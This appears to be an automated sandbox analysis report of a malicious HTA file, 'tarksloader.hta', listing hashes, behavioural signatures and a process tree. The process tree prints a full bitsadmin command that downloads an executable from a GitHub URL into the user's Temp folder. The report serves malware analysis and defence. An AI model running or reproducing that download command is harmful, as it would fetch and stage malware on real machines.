Analysis
-
max time kernel
117s -
max time network
117s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system -
submitted
26/03/2025, 15:38
Static task
static1
Behavioral task
behavioral1
Sample
tarksloader.hta
Resource
win7-20241023-en
4 signatures
150 seconds
General
-
Target
tarksloader.hta
-
Size
944B
-
MD5
cc3c0e6f75302fb6c2d9b5e7f487efe8
-
SHA1
aa94427fcc50b727fa22914292ea5c95755823d9
-
SHA256
354d082858bfc5e24133854ff14bb2e89bc16e1b010b9d3372c8370d3144cdb9
-
SHA512
24f7550776de67d94311840a68fd0f0d0041c9b2035b47899739ffbdb7c1c83281f8c3cfbf6884ad214b74f6bbb386565b4a1836e7bad1f88e661a940b8c304b
Malware Config
Signatures
-
Download via BitsAdmin 1 TTPs 1 IoCs
pid Process 2596 bitsadmin.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2592 wrote to memory of 2596 2592 mshta.exe 30 PID 2592 wrote to memory of 2596 2592 mshta.exe 30 PID 2592 wrote to memory of 2596 2592 mshta.exe 30 PID 2592 wrote to memory of 2596 2592 mshta.exe 30
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\tarksloader.hta"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2592 -
C:\Windows\SysWOW64\bitsadmin.exe"C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/ruthmooregmuax/ruthmooregmuax/raw/refs/heads/main/system.exe C:\Users\Admin\AppData\Local\Temp\system.exe2⤵
- Download via BitsAdmin
- System Location Discovery: System Language Discovery
PID:2596
-